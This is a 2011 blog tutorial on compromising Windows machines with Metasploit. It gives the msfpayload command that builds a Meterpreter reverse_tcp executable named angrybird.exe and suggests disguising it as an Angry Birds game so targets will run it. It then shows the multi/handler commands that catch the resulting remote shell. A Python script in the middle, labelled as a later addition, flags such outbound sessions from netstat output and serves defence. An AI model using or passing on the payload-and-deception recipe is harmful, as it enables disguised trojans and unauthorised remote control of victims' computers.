Saturday, July 23, 2011

Hacking Windows with Metasploit

We will have a brief tutorial on the Metasploit multi/handler exploit using a Meterpreter reverse_tcp payload.
Metasploit is the single most powerful open source tool available today for penetration testers. It can be used for developing and executing exploit code against a remote target machine, and it is a very famous and widely used penetration tester's choice.
Metasploit Framework has 4 interfaces to work with:
1. MSF command line
2. MSF console
3. MSF GUI
4. Armitage (recently included along with the framework)
There was also a web-based version, which later became obsolete since it was buggy. Msfconsole is the most widely used and powerful mode of the Metasploit Framework.
Metasploit in Matriux:
My tutorial uses Matriux as the operating system, which can be found here -
The Metasploit Framework is found in the Matriux Arsenal under Menu > Arsenal > Framework > Metasploit Framework.

Optionally it can be started from the terminal by typing msfconsole or msfgui, depending on what you prefer.

This is how the graphical interface typically looks:

However, we will proceed with msfconsole, which I suggest is the most extensive mode for using the Metasploit Framework, and walk through the multi/handler exploit with a Meterpreter reverse_tcp payload.
Start the Metasploit Framework by typing “msfconsole” in the terminal, and also type “msfupdate” to update the framework.

Now, to start with multi/handler, we have to generate the exe bundled with the Meterpreter reverse_tcp payload that we would share with the target Windows machines to exploit them. Open up a new terminal and type “msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=1080 X > /home/matriux/angrybird.exe” (no spaces around the = signs).
where LHOST => local host IP (our own machine, the one the handler will listen on) and LPORT => port to listen on

This will generate an angrybird.exe file in the home directory as shown here. This file is to be shared with the target machines we intend to exploit (you can fool your target by changing the icon of the generated exe and making it look like an Angry Birds game file ;))

After sharing the file with the target, we wait for the execution of that file. Meanwhile we start the reverse_tcp handler on our system. After starting msfconsole we start the Metasploit process with “use multi/handler”, and set the payload by typing “set payload windows/meterpreter/reverse_tcp”.

Now set the options LHOST and LPORT by typing “set LHOST localIP” and “set LPORT port_to_listen”. Set them to match the exe payload we generated earlier; you can check the options required by typing “show options”.

We are now ready to exploit our target machines (here I set up a Windows XP machine). Initiate the listening process by typing “exploit” and wait for the target machine to execute angrybird.exe; as soon as the victim clicks on the executable, it will initialize the Meterpreter session over the reverse TCP connection.
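As a defender-side check added here (not part of the original post), the following Python script parses `netstat -ano` output from a Windows host and flags established outbound sessions that go to the handler port used above or come from a process that should not be making network connections at all; the sample netstat rows, the PID-to-image map and the expected-process list are constructed for this example.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of Windows `netstat -ano` output (not from the post): one
# session goes to the handler port used in the tutorial (LPORT 1080).
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       892
  TCP    192.168.56.101:49160   93.184.216.34:443      ESTABLISHED     2312
  TCP    192.168.56.101:49163   192.168.56.1:1080      ESTABLISHED     3480
  UDP    0.0.0.0:500            *:*                                    1120
"""

# Constructed PID -> image-name map, as `tasklist` would report (assumed values).
SAMPLE_TASKLIST = {892: "svchost.exe", 2312: "iexplore.exe",
                   3480: "angrybird.exe", 1120: "lsass.exe"}

# The LPORT from the tutorial plus 4444, Metasploit's default listener port.
HANDLER_PORTS = {1080, 4444}
# Processes we expect to hold outbound sessions on a workstation (assumed list).
EXPECTED_NETWORK_IMAGES = {"iexplore.exe", "firefox.exe", "svchost.exe"}

ESTABLISHED_RE = re.compile(
    r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+ESTABLISHED\s+(\d+)\s*$")


def parse_established(netstat_text: str) -> List[Tuple[int, str, int]]:
    """Return (pid, remote_ip, remote_port) for every ESTABLISHED TCP row."""
    sessions = []
    for line in netstat_text.splitlines():
        m = ESTABLISHED_RE.match(line)
        if m:
            sessions.append((int(m.group(5)), m.group(3), int(m.group(4))))
    return sessions


def suspicious_sessions(netstat_text: str, pid_to_image: Dict[int, str],
                        handler_ports=HANDLER_PORTS,
                        expected_images=EXPECTED_NETWORK_IMAGES):
    """Flag sessions to a known handler port, or from a process that should not
    be talking out at all (e.g. a 'game' dropped into the home directory)."""
    flagged = []
    for pid, rip, rport in parse_established(netstat_text):
        image = pid_to_image.get(pid, "<unknown>")
        if rport in handler_ports or image not in expected_images:
            flagged.append((pid, image, rip, rport))
    return flagged


if __name__ == "__main__":
    for hit in suspicious_sessions(SAMPLE_NETSTAT, SAMPLE_TASKLIST):
        print("suspicious outbound session:", hit)
```

On a real host, pipe the output of `netstat -ano` and `tasklist` into these functions; a reverse_tcp Meterpreter session shows up as an ESTABLISHED connection from the dropped executable to the handler's LHOST:LPORT.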

BINGO, we are done!!! We successfully exploited a Windows XP machine with multi/handler.

And have you noticed? We just showed you a preview of Matriux's upcoming version ;) Ch33rs!!!

This article was earlier published by me in CHmag in the July 2011 issue -
